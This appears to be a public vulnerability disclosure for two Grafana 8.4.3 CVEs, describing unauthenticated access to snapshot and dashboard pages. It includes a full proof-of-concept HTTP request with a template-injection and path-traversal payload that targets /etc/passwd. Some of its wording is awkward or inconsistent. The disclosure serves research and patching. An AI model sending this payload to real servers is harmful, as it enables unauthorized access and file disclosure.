Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

grafana

grafana 8.4.3 (b7d2911ca), works on 8.5.5 ( tested for @TheFrenchGhosty )

First point - CVE-2022-32276

Unauthenticated and authenticated users can send a false request for snapshot query using random key parameters, having access to the system dashboard area by going through the login page.

• Rated version: 8.4.3 (b7d2911ca) • Access the system the user is directed to the system home page, as image 1 image

Image 1: login form

It has been verified that an unauthenticated user knowing the vulnerable directories can enter random ID value which allows unauthenticated access to the hospitalized system pages. Parameter used: /dashboard/snapshot/*?orgId=0 /invite/: image

Image 2: Unauthenticated access to snapshot list

image

Image 3: Unauthenticated access to the dashboard menu

image

Image 4: Unauthenticated access to the filter menu

Second point - CVE-2022-32275

• Rated version: 8.4.3 (b7d2911ca) • Injection of parameters in http request.

The failure is not a path traversal, but a session control failure. When the traversal path is explored, the authentication system redirects to an internal system page that should only be accessed by authenticated users.

image

Image 5: login form

Viewing the request in burpsuite image

Image 6: Intercepting the request by burpsuite

Change the request by adding /{{constructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 , encode : /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1

image

Image 7: Request changed before submission to server

image

Image 8: Data returned from the tampered request

POC 2

Send the request to the Burpsuite Repeater function and change the request header to:

GET /dashboard/snapshot/%7B%7Bconstructor.constructor'/.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd?orgId=1 HTTP/1.1
Host: <grafana_host>:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-BR,en;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close-up
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

image

Image 9: Changing the request in the repeater function.

image

Image 10: Unauthenticated access

References:

  • https://cwe.mitre.org/data/definitions/1345.html
  • https://cwe.mitre.org/data/definitions/284.html
  • https://cwe.mitre.org/data/definitions/552.html
  • https://cwe.mitre.org/data/definitions/548.html
  • https://cwe.mitre.org/data/definitions/706.html
  • https://owasp.org/www-pdf-archive/OWASP_SCP_v1.3_pt-BR.pdf
  • Just for information, the failure pointed out generated task 53051 (grafana/grafana#53051) which was completed by the grafana team and ended on 08/01/2022

  • grafana/grafana#53051